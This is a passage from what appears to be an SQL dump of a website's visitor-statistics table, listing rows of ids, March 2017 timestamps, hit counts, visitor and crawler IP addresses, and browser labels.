92975,1489386397,2,2,0,0,'91.196.178.99','chrome'),(92976,1489386510,1,1,0,0,'141.8.142.175','other'),(92977,1489386659,1,0,1,0,'66.249.76.108',''),(92978,1489386864,1,1,0,0,'91.196.178.33','firefox'),(92979,1489386973,1,1,0,0,'141.8.142.61','other'),(92980,1489387261,1,1,0,0,'141.8.183.25','other'),(92981,1489387306,4,4,0,0,'91.196.178.99','chrome'),(92982,1489387985,1,0,1,0,'40.77.167.98',''),(92983,1489388311,1,1,0,0,'51.255.65.66','other'),(92984,1489388953,1,1,0,0,'91.196.177.110','chrome'),(92985,1489389904,1,1,0,0,'91.196.177.46','firefox'),(92986,1489389905,2,2,0,0,'91.196.178.99','chrome'),(92987,1489390042,1,1,0,0,'91.196.178.97','chrome'),(92988,1489390123,1,1,0,0,'91.196.178.72','chrome'),(92989,1489390290,1,1,0,0,'141.0.14.75','chrome'),(92990,1489390691,1,0,1,0,'66.249.76.30',''),(92991,1489390709,1,1,0,0,'193.19.152.14','chrome'),(92992,1489390990,1,1,0,0,'82.207.91.234','firefox'),(92993,1489391044,1,0,1,0,'66.249.76.29',''),(92994,1489391071,1,1,0,0,'82.207.38.91','firefox'),(92995,1489391084,1,1,0,0,'91.214.163.30','chrome'),(92996,1489391126,1,1,0,0,'141.8.142.78','other'),(92997,1489391306,1,0,1,0,'66.249.76.107',''),(92998,1489391679,1,1,0,0,'141.0.15.34','chrome'),(92999,1489391684,1,1,0,0,'91.196.178.67','chrome'),(93000,1489391804,1,1,0,0,'51.255.65.54','other'),(93001,1489392104,1,1,0,0,'91.196.178.70','firefox'),(93002,1489392176,1,1,0,0,'91.196.178.72','chrome'),(93003,1489392218,1,0,1,0,'66.249.66.183',''),(93004,1489392401,1,1,0,0,'51.255.65.50','other'),(93005,1489392413,1,1,0,0,'80.254.155.43','other'),(93006,1489392459,2,2,0,0,'46.201.242.237','firefox'),(93007,1489392515,1,1,0,0,'164.132.161.93','other'),(93008,1489392668,1,1,0,0,'78.111.185.167','firefox'),(93009,1489393573,7,7,0,0,'91.196.178.99','chrome'),(93010,1489393982,1,1,0,0,'82.145.221.61','chrome'),(93011,1489394274,1,1,0,0,'91.196.178.70','firefox'),(93012,1489395377,1,0,1,0,'68.180.229.99',''),(93013,1489395448,1,1,0,0,'91.196.178.70','firefox'),(93014,1489395703,1,1,0,0,'164.132.161.65','other'),(93015,1489396038,2,2,0,0,'91.196.178.67','chrome'),(93016,1489396061,1,1,0,0,'91.196.178.66','chrome'),(93017,1489397291,1,0,1,0,'40.77.167.33',''),(93018,1489397456,1,1,0,0,'51.255.65.69','other'),(93019,1489397635,2,2,0,0,'93.74.212.147','firefox'),(93020,1489397863,1,1,0,0,'91.196.177.46','chrome'),(93021,1489398219,1,1,0,0,'94.179.119.78','firefox'),(93022,1489398481,1,1,0,0,'91.196.178.70','firefox'),(93023,1489398617,1,1,0,0,'46.201.242.237','firefox'),(93024,1489399966,3,3,0,0,'91.196.178.70','firefox'),(93025,1489400128,2,2,0,0,'46.201.242.237','firefox'),(93026,1489400809,1,1,0,0,'91.196.178.167','chrome'),(93027,1489400813,1,1,0,0,'46.201.39.155','chrome'),(93028,1489400929,1,1,0,0,'95.135.8.46','chrome'),(93029,1489401030,1,1,0,0,'91.196.178.135','firefox'),(93030,1489401253,1,1,0,0,'130.193.50.34','other'),(93031,1489401308,1,1,0,0,'94.179.246.23','chrome'),(93032,1489401372,1,1,0,0,'46.201.242.237','firefox'),(93033,1489401422,1,1,0,0,'51.255.65.85','other'),(93034,1489401954,1,1,0,0,'164.132.161.16','other'),(93035,1489401963,1,1,0,0,'91.214.163.30','chrome'),(93036,1489401990,1,1,0,0,'91.196.177.46','chrome'),(93037,1489403097,1,0,1,0,'66.249.76.109',''),(93038,1489403148,1,1,0,0,'141.8.183.25','other'),(93039,1489403158,1,1,0,0,'141.8.142.175','other'),(93040,1489403161,1,1,0,0,'141.8.183.19','other'),(93041,1489403373,2,2,0,0,'46.201.242.237','firefox'),(93042,1489403420,1,1,0,0,'91.196.177.26','chrome'),(93043,1489403479,1,0,1,0,'66.249.76.30',''),(93044,1489404195,1,1,0,0,'91.196.178.167','chrome'),(93045,1489404538,1,1,0,0,'46.201.242.237','firefox'),(93046,1489404629,1,1,0,0,'91.196.177.46','chrome'),(93047,1489407276,1,1,0,0,'91.196.178.66','chrome'),(93048,1489407616,1,1,0,0,'51.255.65.48','other'),(93049,1489407644,1,0,1,0,'66.249.66.177',''),(93050,1489408052,1,1,0,0,'68.64.160.14','chrome'),(93051,1489408346,1,0,1,0,'66.249.76.28',''),(93052,1489408868,2,2,0,0,'66.249.93.204','chrome'),(93053,1489408947,1,1,0,0,'31.43.5.118','chrome'),(93054,1489409067,1,0,1,0,'68.180.229.99',''),(93055,1489409324,1,0,1,0,'40.77.167.33',''),(93056,1489409788,1,1,0,0,'91.196.178.68','firefox'),(93057,1489409924,1,1,0,0,'40.77.167.33','other'),(93058,1489410072,1,1,0,0,'163.172.64.254','other'),(93059,1489410267,1,1,0,0,'46.211.1.202','chrome'),(93060,1489410700,1,0,1,0,'68.180.230.114',''),(93061,1489411280,1,1,0,0,'193.194.127.217','firefox'),(93062,1489411444,1,1,0,0,'37.52.17.207','chrome'),(93063,1489411613,1,1,0,0,'37.53.228.34','firefox'),(93064,1489412312,1,1,0,0,'91.196.178.70','firefox'),(93065,1489412765,1,1,0,0,'37.53.228.34','firefox'),(93066,1489413216,1,1,0,0,'130.180.216.27','chrome'),(93067,1489413688,1,1,0,0,'176.106.5.130','chrome'),(93068,1489413891,1,1,0,0,'178.95.158.219','chrome'),(93069,1489413905,1,1,0,0,'141.8.183.19','other'),(93070,1489413918,1,1,0,0,'194.44.244.142','chrome'),(93071,1489413980,1,1,0,0,'91.196.177.46','chrome'),(93072,1489414714,1,1,0,0,'164.132.161.90','other'),(93073,1489414794,1,0,1,0,'66.249.76.107',''),(93074,1489415070,1,1,0,0,'51.255.65.73','other'),(93075,1489415453,1,1,0,0,'94.179.109.217','chrome'),(93076,1489415469,1,1,0,0,'130.193.50.38','other'),(93077,1489416099,1,1,0,0,'95.132.10.157','firefox'),(93078,1489417285,24,24,0,0,'88.198.16.12','other'),(93079,1489417798,1,1,0,0,'91.196.178.167','chrome'),(93080,1489417881,1,1,0,0,'91.196.178.70','chrome'),(93081,1489418301,1,1,0,0,'91.196.178.165','firefox'),(93082,1489419553,1,0,1,0,'66.249.76.30',''),(93083,1489419605,1,1,0,0,'51.255.65.67','other'),(93084,1489420239,1,0,1,0,'66.249.76.109',''),(93085,1489420336,1,1,0,0,'141.8.142.61','other'),(93086,1489420445,1,1,0,0,'31.43.20.79','chrome'),(93087,1489421340,1,1,0,0,'176.193.149.184','opera'),(93088,1489421525,1,1,0,0,'91.196.178.35','chrome'),(93089,1489421813,1,1,0,0,'37.73.229.107','chrome'),(93090,1489422159,1,1,0,0,'51.255.65.6','other'),(93091,1489423540,1,1,0,0,'91.196.178.68','firefox'),(93092,1489425831,1,1,0,0,'91.196.178.102','chrome'),(93093,1489425966,1,0,1,0,'66.249.66.81',''),(93094,1489426517,1,1,0,0,'37.55.59.70','chrome'),(93095,1489428396,1,0,1,0,'66.249.66.81',''),(93096,1489429605,1,1,0,0,'157.55.39.20','other'),(93097,1489430999,1,1,0,0,'164.132.161.92','other'),(93098,1489431139,1,1,0,0,'163.172.71.13','other'),(93099,1489431738,1,1,0,0,'130.193.50.38','other'),(93100,1489432136,1,1,0,0,'51.255.65.5','other'),(93101,1489432336,1,1,0,0,'40.77.167.33','other'),(93102,1489432363,1,1,0,0,'94.179.46.180','chrome'),(93103,1489433041,1,1,0,0,'163.172.64.193','other'),(93104,1489434234,1,0,1,0,'68.180.229.99',''),(93105,1489434518,1,0,1,0,'66.249.76.108',''),(93106,1489435179,1,1,0,0,'164.132.161.42','other'),(93107,1489435283,1,1,0,0,'164.132.161.91','other'),(93108,1489438503,1,0,1,0,'66.249.76.108',''),(93109,1489439101,1,1,0,0,'91.196.178.162','chrome'),(93110,1489441025,1,1,0,0,'93.72.242.255','chrome'),(93111,1489442668,1,1,0,0,'51.255.65.36','other'),(93112,1489443154,1,1,0,0,'141.8.142.175','other'),(93113,1489443572,1,1,0,0,'51.255.65.53','other'),(93114,1489445899,1,1,0,0,'164.132.161.21','other'),(93115,1489446457,1,1,0,0,'157.55.39.20','other'),(93116,1489446566,1,1,0,0,'5.9.98.178','other'),(93117,1489446613,1,1,0,0,'164.132.161.80','other'),(93118,1489446624,1,1,0,0,'51.255.65.68','other'),(93119,1489447468,1,1,0,0,'5.9.98.178','other'),(93120,1489448120,1,1,0,0,'164.132.161.53','other'),(93121,1489448232,1,1,0,0,'5.9.61.111','other'),(93122,1489448370,1,1,0,0,'5.9.98.178','other'),(93123,1489449281,1,1,0,0,'5.9.98.178','other'),(93124,1489450182,1,1,0,0,'5.9.98.178','other'),(93125,1489450595,1,0,1,0,'66.249.76.30',''),(93126,1489451090,1,1,0,0,'5.9.98.178','other'),(93127,1489452183,1,1,0,0,'157.55.39.20','other'),(93128,1489453385,1,1,0,0,'51.255.65.32','other'),(93129,1489454583,1,1,0,0,'141.8.132.41','other'),(93130,1489455227,1,0,1,0,'66.249.66.81',''),(93131,1489455347,1,0,1,0,'68.180.229.99',''),(93132,1489455827,1,0,1,0,'66.249.66.177',''),(93133,1489456668,1,1,0,0,'163.172.64.226','other'),(93134,1489456993,1,1,0,0,'163.172.64.177','other'),(93135,1489457176,1,1,0,0,'51.255.65.65','other'),(93136,1489457750,1,1,0,0,'51.255.65.52','other'),(93137,1489458329,1,1,0,0,'180.76.15.15','other'),(93138,1489458332,1,1,0,0,'207.46.13.155','other'),(93139,1489458501,1,1,0,0,'208.43.225.84','other'),(93140,1489458569,1,1,0,0,'164.132.161.92','other'),(93141,1489459216,1,0,1,0,'66.249.66.180',''),(93142,1489459751,1,1,0,0,'157.55.39.20','other'),(93143,1489459762,1,1,0,0,'51.255.65.68','other'),(93144,1489460081,1,0,1,0,'66.249.76.108',''),(93145,1489460153,1,0,1,0,'68.180.229.99',''),(93146,1489460550,1,0,1,0,'66.249.76.30',''),(93147,1489460742,1,0,1,0,'157.55.39.20',''),(93148,1489461237,1,1,0,0,'164.132.161.83','other'),(93149,1489462029,1,1,0,0,'51.255.65.84','other'),(93150,1489462171,2,2,0,0,'78.111.189.9','chrome'),(93151,1489463233,1,1,0,0,'51.255.65.36','other'),(93152,1489464228,65,65,0,0,'64.140.169.42','firefox'),(93153,1489465992,1,1,0,0,'130.193.51.19','other'),(93154,1489466243,3,3,0,0,'146.185.132.236','other'),(93155,1489466676,1,1,0,0,'163.172.64.254','other'),(93156,1489467228,1,1,0,0,'66.249.76.30','chrome'),(93157,1489467233,1,1,0,0,'51.255.65.97','other'),(93158,1489467296,2,2,0,0,'146.185.132.236','other'),(93159,1489467552,1,1,0,0,'51.255.65.42','other'),(93160,1489467865,2,2,0,0,'37.73.223.193','chrome'),(93161,1489468894,1,1,0,0,'40.77.167.33','other'),(93162,1489469346,1,0,1,0,'66.249.66.87',''),(93163,1489469423,1,1,0,0,'91.196.178.65','firefox'),(93164,1489469604,1,1,0,0,'37.52.23.162','firefox'),(93165,1489470728,1,1,0,0,'212.58.160.35','other'),(93166,1489470830,1,1,0,0,'164.132.161.69','other'),(93167,1489471327,1,1,0,0,'66.249.93.156','chrome'),(93168,1489471705,1,1,0,0,'163.172.64.216','other'),(93169,1489471948,1,1,0,0,'82.207.27.3','firefox'),(93170,1489472118,1,1,0,0,'164.132.161.81','other'),(93171,1489473886,1,1,0,0,'91.196.178.65','firefox'),(93172,1489474299,1,1,0,0,'164.132.161.24','other'),(93173,1489474479,4,4,0,0,'91.196.178.70','firefox'),(93174,1489474773,1,1,0,0,'91.196.178.70','chrome'),(93175,1489475907,1,1,0,0,'91.196.178.69','chrome'),(93176,1489476111,1,1,0,0,'95.133.166.184','chrome'),(93177,1489476129,1,1,0,0,'93.158.152.61','other'),(93178,1489476356,1,1,0,0,'95.135.24.82','firefox'),(93179,1489476361,1,1,0,0,'193.194.127.217','firefox'),(93180,1489476761,1,0,1,0,'66.249.66.180',''),(93181,1489477425,1,1,0,0,'141.8.142.175','other'),(93182,1489477613,1,1,0,0,'92.113.1.227','chrome'),(93183,1489477752,1,1,0,0,'91.196.178.132','firefox'),(93184,1489478220,2,2,0,0,'91.196.178.66','chrome'),(93185,1489478254,1,1,0,0,'51.255.65.74','other'),(93186,1489478837,1,1,0,0,'180.76.15.137','other'),(93187,1489478907,1,1,0,0,'51.255.65.35','other'),(93188,1489479401,1,1,0,0,'80.70.78.21','chrome'),(93189,1489479424,1,1,0,0,'141.8.142.175','other'),(93190,1489479986,2,2,0,0,'91.196.177.20','chrome'),(93191,1489480305,1,1,0,0,'195.64.190.1','other'),(93192,1489480596,2,2,0,0,'83.170.203.142','chrome'),(93193,1489480688,1,1,0,0,'163.172.64.244','other'),(93194,1489480799,1,1,0,0,'46.201.242.237','firefox'),(93195,1489480860,1,1,0,0,'51.255.65.42','other'),(93196,1489481603,1,1,0,0,'94.179.48.65','firefox'),(93197,1489481821,1,1,0,0,'78.111.187.142','firefox'),(93198,1489481834,1,1,0,0,'51.255.65.14','other'),(93199,1489482008,2,2,0,0,'46.201.242.237','firefox'),(93200,1489482148,2,2,0,0,'37.73.244.69','chrome'),(93201,1489482382,1,1,0,0,'91.196.178.70','firefox'),(93202,1489482594,1,1,0,0,'195.64.190.1','other'),(93203,1489482853,1,1,0,0,'180.76.15.28','other'),(93204,1489483133,3,3,0,0,'46.201.242.237','firefox'),(93205,1489483290,1,0,1,0,'207.46.13.233',''),(93206,1489483301,1,1,0,0,'91.196.178.70','other'),(93207,1489483327,1,1,0,0,'176.36.50.232','other'),(93208,1489483432,1,1,0,0,'207.46.13.241','other'),(93209,1489483820,1,1,0,0,'195.49.151.99','chrome'),(93210,1489484230,1,1,0,0,'51.255.65.9','other'),(93211,1489484885,1,1,0,0,'78.111.186.108','firefox'),(93212,1489485635,1,0,1,0,'157.55.39.110',''),(93213,1489485785,1,1,0,0,'51.255.65.15','other'),(93214,1489486064,1,1,0,0,'164.132.161.51','other'),(93215,1489486741,1,1,0,0,'185.126.252.152','chrome'),(93216,1489486945,1,1,0,0,'94.179.116.49','firefox'),(93217,1489487211,1,1,0,0,'91.196.178.166','chrome'),(93218,1489487302,1,1,0,0,'78.111.185.2','firefox'),(93219,1489487309,1,1,0,0,'94.179.209.42','chrome'),(93220,1489487477,1,1,0,0,'51.255.65.76','other'),(93221,1489487844,1,1,0,0,'37.53.84.190','chrome'),(93222,1489488459,1,1,0,0,'93.158.152.84','other'),(93223,1489488473,1,1,0,0,'141.8.142.61','other'),(93224,1489488576,1,1,0,0,'164.132.161.38','other'),(93225,1489488698,1,1,0,0,'77.37.137.48','opera'),(93226,1489488849,1,1,0,0,'141.8.142.175','other'),(93227,1489489384,1,1,0,0,'37.54.20.171','chrome'),(93228,1489489483,1,1,0,0,'91.196.178.72','firefox'),(93229,1489489661,1,1,0,0,'91.196.178.70','firefox'),(93230,1489489962,1,1,0,0,'46.201.242.237','firefox'),(93231,1489490006,1,1,0,0,'78.111.186.112','chrome'),(93232,1489490312,1,0,1,0,'66.249.66.81',''),(93233,1489490415,1,1,0,0,'37.54.20.171','chrome'),(93234,1489490649,1,1,0,0,'164.132.161.91','other'),(93235,1489492195,1,1,0,0,'91.201.247.97','chrome'),(93236,1489492766,1,1,0,0,'91.219.144.98','chrome'),(93237,1489493060,1,1,0,0,'93.72.149.119','chrome'),(93238,1489493110,141,141,0,0,'204.12.208.10','other'),(93239,1489493235,1,1,0,0,'91.209.11.236','other'),(93240,1489493822,1,1,0,0,'91.196.178.132','firefox'),(93241,1489493858,2,2,0,0,'46.201.242.237','firefox'),(93242,1489494012,66,66,0,0,'204.12.208.10','other'),(93243,1489494612,1,1,0,0,'95.158.43.29','chrome'),(93244,1489495244,1,1,0,0,'51.255.65.96','other'),(93245,1489495341,1,1,0,0,'46.211.96.128','other'),(93246,1489495470,1,1,0,0,'164.132.161.50','other'),(93247,1489495608,1,1,0,0,'141.8.183.25','other'),(93248,1489496438,1,1,0,0,'82.207.125.66','chrome'),(93249,1489496547,1,1,0,0,'178.94.59.182','chrome'),(93250,1489496953,1,1,0,0,'195.230.130.104','chrome'),(93251,1489496967,1,1,0,0,'141.8.142.175','other'),(93252,1489497000,1,1,0,0,'91.196.178.70','firefox'),(93253,1489497033,1,0,1,0,'66.249.66.81',''),(93254,1489497710,1,1,0,0,'51.255.65.6','other'),(93255,1489498215,1,0,1,0,'66.249.76.109',''),(93256,1489498883,1,1,0,0,'91.196.178.70','firefox'),(93257,1489499610,1,1,0,0,'51.255.65.73','other'),(93258,1489499748,1,1,0,0,'130.180.209.113','chrome'),(93259,1489499835,1,1,0,0,'46.201.242.237','firefox'),(93260,1489500238,1,1,0,0,'91.196.178.68','chrome'),(93261,1489500615,1,1,0,0,'51.255.65.32','other'),(93262,1489500683,1,0,1,0,'157.55.39.110',''),(93263,1489500705,1,1,0,0,'94.179.53.111','firefox'),(93264,1489500714,2,2,0,0,'83.170.203.142','chrome'),(93265,1489501348,1,1,0,0,'164.132.161.55','other'),(93266,1489501468,1,1,0,0,'66.249.76.29','chrome'),(93267,1489501723,1,1,0,0,'180.76.15.22','other'),(93268,1489501760,1,1,0,0,'94.179.75.233','chrome'),(93269,1489502112,1,1,0,0,'46.200.103.2','opera'),(93270,1489502717,2,2,0,0,'185.26.180.166','chrome'),(93271,1489502841,1,1,0,0,'163.172.64.184','other'),(93272,1489502984,1,1,0,0,'51.255.65.49','other'),(93273,1489503065,1,1,0,0,'193.108.50.39','chrome'),(93274,1489503097,1,1,0,0,'91.196.177.15','chrome'),(93275,1489503332,1,1,0,0,'164.132.161.40','other'),(93276,1489503745,1,0,1,0,'66.249.76.107',''),(93277,1489503809,2,2,0,0,'46.201.82.214','chrome'),(93278,1489503836,1,1,0,0,'66.249.66.87','chrome'),(93279,1489503854,1,1,0,0,'66.249.76.108','chrome'),(93280,1489503978,1,1,0,0,'37.52.16.155','chrome'),(93281,1489504047,1,0,1,0,'66.249.76.28',''),(93282,1489504062,1,1,0,0,'51.255.65.23','other'),(93283,1489504097,1,1,0,0,'164.132.161.52','other'),(93284,1489504100,1,0,1,0,'66.249.76.30',''),(93285,1489504128,1,1,0,0,'91.196.178.132','firefox'),(93286,1489504783,1,1,0,0,'46.201.82.214','chrome'),(93287,1489505069,1,0,1,0,'66.249.76.107',''),(93288,1489507421,1,1,0,0,'91.196.178.165','chrome'),(93289,1489507647,1,1,0,0,'46.48.13.161','chrome'),(93290,1489508042,1,1,0,0,'91.196.178.72','firefox'),(93291,1489508779,1,0,1,0,'207.46.13.233',''),(93292,1489509210,1,1,0,0,'46.48.13.161','chrome'),(93293,1489509457,1,0,1,0,'66.249.66.183',''),(93294,1489509649,1,1,0,0,'91.196.178.33','firefox'),(93295,1489509681,1,0,1,0,'66.249.76.29',''),(93296,1489509760,1,1,0,0,'164.132.161.11','other'),(93297,1489510404,2,2,0,0,'141.8.142.175','other'),(93298,1489510407,1,1,0,0,'141.8.142.61','other'),(93299,1489510419,4,4,0,0,'95.108.179.22','other'),(93300,1489510422,1,1,0,0,'141.8.183.25','other'),(93301,1489510929,1,0,1,0,'66.249.76.28',''),(93302,1489511015,1,0,1,0,'66.249.66.84',''),(93303,1489511154,1,0,1,0,'66.249.76.109',''),(93304,1489511258,1,1,0,0,'207.46.13.233','other'),(93305,1489511390,1,0,1,0,'66.249.76.29',''),(93306,1489511671,1,1,0,0,'164.132.161.38','other'),(93307,1489511840,1,1,0,0,'93.158.152.75','other'),(93308,1489511981,1,1,0,0,'163.172.71.29','other'),(93309,1489513272,1,0,1,0,'66.249.66.81',''),(93310,1489513676,1,1,0,0,'91.196.178.71','chrome'),(93311,1489513741,1,1,0,0,'178.154.189.37','other'),(93312,1489514164,4,0,4,0,'68.180.229.99',''),(93313,1489514778,1,1,0,0,'130.193.50.38','other'),(93314,1489515644,1,1,0,0,'93.158.152.61','other'),(93315,1489516034,1,1,0,0,'91.196.178.136','chrome'),(93316,1489516266,1,1,0,0,'91.196.178.70','other'),(93317,1489516874,1,1,0,0,'157.55.39.139','other'),(93318,1489516914,1,1,0,0,'144.76.4.148','other'),(93319,1489516926,1,0,1,0,'66.249.66.84',''),(93320,1489517251,1,1,0,0,'163.172.64.181','other'),(93321,1489517379,1,0,1,0,'66.249.66.180',''),(93322,1489517546,1,1,0,0,'130.193.50.38','other'),(93323,1489517550,1,1,0,0,'5.255.253.68','other'),(93324,1489517851,1,1,0,0,'207.46.13.233','other'),(93325,1489517873,1,1,0,0,'164.132.161.57','other'),(93326,1489518617,1,1,0,0,'164.132.161.94','other'),(93327,1489519456,1,1,0,0,'95.108.179.22','other'),(93328,1489519645,1,1,0,0,'37.55.58.201','firefox'),(93329,1489520878,1,1,0,0,'95.108.179.22','other'),(93330,1489521368,1,1,0,0,'141.8.183.25','other'),(93331,1489521681,1,1,0,0,'176.195.111.197','msie'),(93332,1489522858,1,1,0,0,'164.132.161.91','other'),(93333,1489523696,1,0,1,0,'66.249.76.28',''),(93334,1489525243,1,1,0,0,'163.172.68.132','other'),(93335,1489525354,1,1,0,0,'178.137.83.166','chrome'),(93336,1489525958,2,2,0,0,'37.73.229.107','chrome'),(93337,1489526576,1,1,0,0,'51.255.65.97','other'),(93338,1489526707,1,1,0,0,'51.255.65.77','other'),(93339,1489526947,3,3,0,0,'95.108.179.22','other'),(93340,1489527109,1,1,0,0,'51.255.65.20','other'),(93341,1489527239,1,1,0,0,'164.132.161.69','other'),(93342,1489528204,1,0,1,0,'66.249.76.109',''),(93343,1489530737,1,1,0,0,'51.255.65.65','other'),(93344,1489531591,1,1,0,0,'51.255.65.14','other'),(93345,1489532037,6,6,0,0,'173.234.159.250','other'),(93346,1489532257,1,0,1,0,'66.249.76.108',''),(93347,1489532966,1,1,0,0,'95.108.179.22','other'),(93348,1489533613,1,1,0,0,'207.46.13.241','other'),(93349,1489533860,1,0,1,0,'66.249.76.28',''),(93350,1489534198,1,0,1,0,'66.249.76.29',''),(93351,1489534679,1,1,0,0,'95.108.179.22','other'),(93352,1489536173,1,0,1,0,'66.249.76.107',''),(93353,1489536642,1,0,1,0,'66.249.76.109',''),(93354,1489537698,1,0,1,0,'207.46.13.241',''),(93355,1489539685,1,1,0,0,'157.55.39.139','other'),(93356,1489540582,1,1,0,0,'95.108.179.22','other'),(93357,1489542148,1,0,1,0,'66.249.76.29',''),(93358,1489542291,1,1,0,0,'95.108.179.22','other'),(93359,1489543784,1,1,0,0,'180.76.15.21','other'),(93360,1489544039,4,0,4,0,'68.180.229.99',''),(93361,1489544413,1,1,0,0,'5.255.253.53','other'),(93362,1489545858,1,1,0,0,'157.55.39.2','other'),(93363,1489547532,1,1,0,0,'95.108.179.22','other'),(93364,1489548549,1,1,0,0,'178.211.104.160','firefox'),(93365,1489548995,2,2,0,0,'83.170.203.142','chrome'),(93366,1489549882,1,1,0,0,'95.108.179.22','other'),(93367,1489550154,1,1,0,0,'51.255.65.64','other'),(93368,1489551160,1,1,0,0,'164.132.161.92','other'),(93369,1489551361,1,0,1,0,'66.249.66.177',''),(93370,1489553781,1,1,0,0,'66.249.66.180','chrome'),(93371,1489554539,1,1,0,0,'164.132.161.75','other'),(93372,1489555237,1,1,0,0,'164.132.161.86','other'),(93373,1489555366,1,1,0,0,'163.172.68.121','other'),(93374,1489555588,2,0,2,0,'66.249.66.180',''),(93375,1489555770,1,1,0,0,'141.8.183.25','other'),(93376,1489556248,1,1,0,0,'91.196.178.68','firefox'),(93377,1489556365,1,0,1,0,'66.249.76.30',''),(93378,1489556458,1,1,0,0,'51.255.65.13','other'),(93379,1489556607,1,1,0,0,'51.255.65.68','other'),(93380,1489557366,1,0,1,0,'66.249.66.180',''),(93381,1489557482,1,1,0,0,'5.255.253.67','other'),(93382,1489557657,1,1,0,0,'66.249.93.156','chrome'),(93383,1489557886,1,0,1,0,'66.249.76.109',''),(93384,1489558572,1,1,0,0,'66.249.76.107','chrome'),(93385,1489558783,1,1,0,0,'163.172.64.226','other'),(93386,1489558832,2,2,0,0,'91.196.178.70','firefox'),(93387,1489559058,1,1,0,0,'178.154.149.10','other'),(93388,1489559463,1,1,0,0,'164.132.161.2','other'),(93389,1489559871,1,1,0,0,'178.92.53.98','chrome'),(93390,1489559918,1,1,0,0,'51.255.65.49','other'),(93391,1489560085,1,1,0,0,'207.46.13.233','other'),(93392,1489560197,1,1,0,0,'91.196.178.67','chrome'),(93393,1489560376,1,1,0,0,'46.201.240.112','firefox'),(93394,1489560612,1,0,1,0,'157.55.39.2',''),(93395,1489561079,1,1,0,0,'91.196.177.46','chrome'),(93396,1489561106,1,0,1,0,'66.249.66.180',''),(93397,1489561334,1,1,0,0,'95.135.231.74','firefox'),(93398,1489561348,2,2,0,0,'91.196.178.70','firefox'),(93399,1489561351,1,1,0,0,'93.158.152.84','other'),(93400,1489562382,1,1,0,0,'37.53.89.22','chrome'),(93401,1489562489,1,1,0,0,'164.132.161.20','other'),(93402,1489562584,1,1,0,0,'163.172.70.217','other'),(93403,1489563385,1,0,1,0,'66.249.76.109',''),(93404,1489563397,1,1,0,0,'130.193.50.38','other'),(93405,1489563400,1,1,0,0,'141.8.132.52','other'),(93406,1489563455,1,1,0,0,'91.196.178.70','firefox'),(93407,1489563785,1,1,0,0,'163.172.64.253','other'),(93408,1489564007,1,1,0,0,'163.172.70.217','other'),(93409,1489564046,1,1,0,0,'178.92.53.98','chrome'),(93410,1489564669,1,1,0,0,'157.55.39.21','other'),(93411,1489564688,2,2,0,0,'95.135.231.74','firefox'),(93412,1489565106,1,1,0,0,'95.108.179.22','other'),(93413,1489565497,1,1,0,0,'212.1.94.126','chrome'),(93414,1489565718,1,1,0,0,'164.132.161.37','other'),(93415,1489565784,1,0,1,0,'68.180.229.99',''),(93416,1489566361,1,1,0,0,'180.76.15.7','other'),(93417,1489566519,1,1,0,0,'163.172.64.216','other'),(93418,1489566730,1,1,0,0,'92.113.12.87','opera'),(93419,1489566742,1,1,0,0,'130.193.51.19','other'),(93420,1489566976,1,1,0,0,'91.196.178.67','chrome'),(93421,1489567220,1,1,0,0,'51.255.65.31','other'),(93422,1489567413,1,1,0,0,'164.132.161.43','other'),(93423,1489567440,1,1,0,0,'82.145.220.234','chrome'),(93424,1489567767,1,0,1,0,'66.249.76.107',''),(93425,1489567970,1,1,0,0,'91.196.178.103','opera'),(93426,1489567980,1,0,1,0,'157.55.39.2',''),(93427,1489568032,1,1,0,0,'66.249.76.30','chrome'),(93428,1489568117,1,1,0,0,'91.124.58.212','firefox'),(93429,1489568362,1,1,0,0,'180.76.15.160','other'),(93430,1489568408,1,0,1,0,'157.55.39.110',''),(93431,1489568427,1,1,0,0,'91.196.178.40','chrome'),(93432,1489568623,1,1,0,0,'164.132.161.24','other'),(93433,1489568986,2,0,2,0,'207.46.13.233',''),(93434,1489569048,1,1,0,0,'164.132.161.15','other'),(93435,1489569257,1,0,1,0,'66.249.76.30',''),(93436,1489569260,1,1,0,0,'37.73.229.107','chrome'),(93437,1489569312,1,1,0,0,'78.111.185.232','firefox'),(93438,1489569445,1,1,0,0,'46.200.115.188','chrome'),(93439,1489569689,1,1,0,0,'46.63.119.218','firefox'),(93440,1489570835,1,1,0,0,'94.179.79.117','firefox'),(93441,1489571008,1,1,0,0,'95.108.179.22','other'),(93442,1489571405,1,1,0,0,'91.196.178.67','chrome'),(93443,1489571819,1,0,1,0,'66.249.76.108',''),(93444,1489571866,1,1,0,0,'66.249.66.182','chrome'),(93445,1489572721,1,1,0,0,'95.108.179.18','other'),(93446,1489572929,1,1,0,0,'91.236.184.51','opera'),(93447,1489573170,1,0,1,0,'66.249.76.107',''),(93448,1489573491,1,1,0,0,'46.201.242.237','firefox'),(93449,1489573536,92,92,0,0,'5.9.89.170','other'),(93450,1489574174,1,0,1,0,'66.249.66.185',''),(93451,1489574480,1,1,0,0,'51.255.65.36','other'),(93452,1489574630,1,1,0,0,'95.108.179.22','other'),(93453,1489574634,1,1,0,0,'141.8.142.67','other'),(93454,1489574893,1,1,0,0,'51.255.65.59','other'),(93455,1489574978,1,1,0,0,'164.132.161.43','other'),(93456,1489576185,1,1,0,0,'164.132.161.59','other'),(93457,1489576255,1,1,0,0,'163.172.68.121','other'),(93458,1489576378,1,1,0,0,'91.196.178.66','chrome'),(93459,1489576472,1,0,1,0,'157.55.39.2',''),(93460,1489576806,1,0,1,0,'66.249.76.30',''),(93461,1489577771,1,1,0,0,'51.255.65.66','other'),(93462,1489577916,2,2,0,0,'82.144.213.158','chrome'),(93463,1489578281,1,1,0,0,'164.132.161.90','other'),(93464,1489578390,1,0,1,0,'66.249.76.28',''),(93465,1489578632,1,1,0,0,'93.158.152.84','other'),(93466,1489578886,1,0,1,0,'66.249.76.109',''),(93467,1489579306,1,0,1,0,'66.249.76.107',''),(93468,1489579898,1,1,0,0,'91.196.178.68','firefox'),(93469,1489580444,2,2,0,0,'157.55.39.110','other'),(93470,1489580541,1,1,0,0,'178.93.198.36','firefox'),(93471,1489580730,1,1,0,0,'163.172.64.181','other'),(93472,1489580738,1,1,0,0,'164.132.161.27','other'),(93473,1489581092,1,1,0,0,'91.196.178.70','firefox'),(93474,1489581219,1,1,0,0,'37.55.57.149','chrome'),(93475,1489581229,1,1,0,0,'163.172.68.127','other'),(93476,1489581521,1,1,0,0,'94.231.180.154','chrome'),(93477,1489581545,1,1,0,0,'95.132.43.69','firefox'),(93478,1489581650,1,0,1,0,'66.249.76.101',''),(93479,1489581674,4,4,0,0,'95.108.179.22','other'),(93480,1489581690,1,1,0,0,'141.8.142.175','other'),(93481,1489582619,1,1,0,0,'163.172.